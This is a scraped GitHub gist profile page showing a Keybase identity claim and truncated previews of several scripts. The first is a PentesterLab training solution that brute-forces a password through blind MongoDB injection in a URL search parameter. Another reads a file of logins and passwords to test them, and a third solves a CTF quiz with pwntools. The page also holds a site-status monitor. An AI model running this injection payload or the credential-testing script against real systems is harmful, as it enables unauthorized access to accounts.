I hereby claim:
- I am marcosValle on github.
- I am marcosvalle (https://keybase.io/marcosvalle) on keybase.
- I have a public key whose fingerprint is A580 4C82 0025 7751 0260 E65A 6FEB C51D B409 402C
To claim this, I am signing this object:
Marcos Valle marcosValle
marcosValle
/ solve.py
Created
September 17, 2019 23:21
PentesterLab Essential Badge: MongoDB Injection 02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from string import digits | |
| password = "" | |
| for i in 'XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX': | |
| for l in '-abcdef'+digits: | |
| print 'Trying ' + password + l | |
| url = "http://[CHANGE ME]/?search=admin' %26%26 this.password.match(/^"+password+l+".*$/)%00" | |
| print url | |
| r = requests.get(url) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from termcolor import colored | |
| import sys | |
| import requests | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| #creds.txt in this format: | |
| #mylogin 12345 | |
| #otherlogin 54321 | |
| #... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import wptools | |
| def getName(conn): | |
| print(conn.recvuntil('What is the birth year of ').decode('utf-8'), end="") | |
| name = conn.recvuntil(' ?', drop=True) | |
| print(name.decode('utf-8')) | |
| return name, conn | |
| def getYear(name): |
marcosValle
/ keybase.md
Created
September 13, 2016 22:24
marcosValle
/ gist:6fdd7e9d64c64b413cef7247aa35ed03
Created
June 6, 2016 01:43
— forked from sanbornm/gist:177420
Simple script to check when your site changes status codes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle, pprint, time, os | |
| import httplib | |
| import smtplib | |
| def emailAlert(alert,subject='You have an alert'): | |
| fromaddr = "youremail@domain.com" | |
| toaddrs = "youremail@domain.com" | |
| # Add the From: and To: headers at the start! |